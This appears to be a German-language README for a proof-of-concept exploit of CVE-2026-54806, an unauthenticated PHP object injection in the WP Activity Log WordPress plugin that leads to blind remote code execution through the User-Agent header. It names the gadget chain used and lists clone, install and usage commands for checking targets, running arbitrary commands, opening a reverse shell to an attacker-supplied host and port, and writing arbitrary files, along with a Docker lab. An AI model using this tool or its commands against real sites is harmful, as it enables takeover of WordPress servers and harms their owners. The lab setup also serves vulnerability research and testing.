
Unauthentifizierte PHP Object Injection zu RCE in WP Activity Log <= 5.6.3.1 (CVE-2026-54806)
CVE-2026-54806 ist eine kritische (CVSS 9.8) nicht authentifizierte PHP-Objekt-Injection-Schwachstelle im WP Activity Log WordPress Plugin (wp-security-audit-log) von Melapress. Ein nicht authentifizierter Angreifer kann serialisierte PHP-Objekte über den User-Agent-Header bei jeder Anforderung injizieren, die ein protokolliertes Ereignis auslöst (z. B. einen fehlgeschlagenen Login). Die injizierte Payload wird in der Datenbank gespeichert und ohne Einschränkungen deserialisiert, wenn ein Administrator das WordPress-Dashboard besucht, was zu einer blinden Remote-Code-Ausführung führt (keine Ausgabe an den Angreifer).
Betroffenes Plugin: WP Activity Log <= 5.6.3.1 (behoben in 5.6.4)
Erforderlich für RCE: WordPress 6.4.0 - 6.4.1 — dieses PoC verwendet das WP_HTML_Token-Gadget, die einzige WP-Kernkette mit ausschließlich öffentlichen Eigenschaften, die sanitize_text_field() übersteht und das 255-Zeichen-Spaltenlimit einhält.
--check--command--shell--write-filegit clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
git clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python3 cve-2026-54806.py -t <target> --check
python3 cve-2026-54806.py -t <target> --command <cmd>
python3 cve-2026-54806.py -t <target> --shell --lhost <ip> --lport <port>
python3 cve-2026-54806.py -t <target> --write-file <content> <path>
In sich geschlossenes Labor mit WordPress 6.4.1 + WP Activity Log 5.6.3.1. Details finden Sie in DOCKER.md.
cd docker
docker compose up -d
python3 cve-2026-54806.py -t http://localhost:8080 --check
Das Labor enthält einen admin-bot, der alle 60s das Dashboard besucht, sodass injizierte Payloads automatisch ausgelöst werden — kein manuelles Eingreifen erforderlich.
Dieses Tool wird ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt. Der Ersteller übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.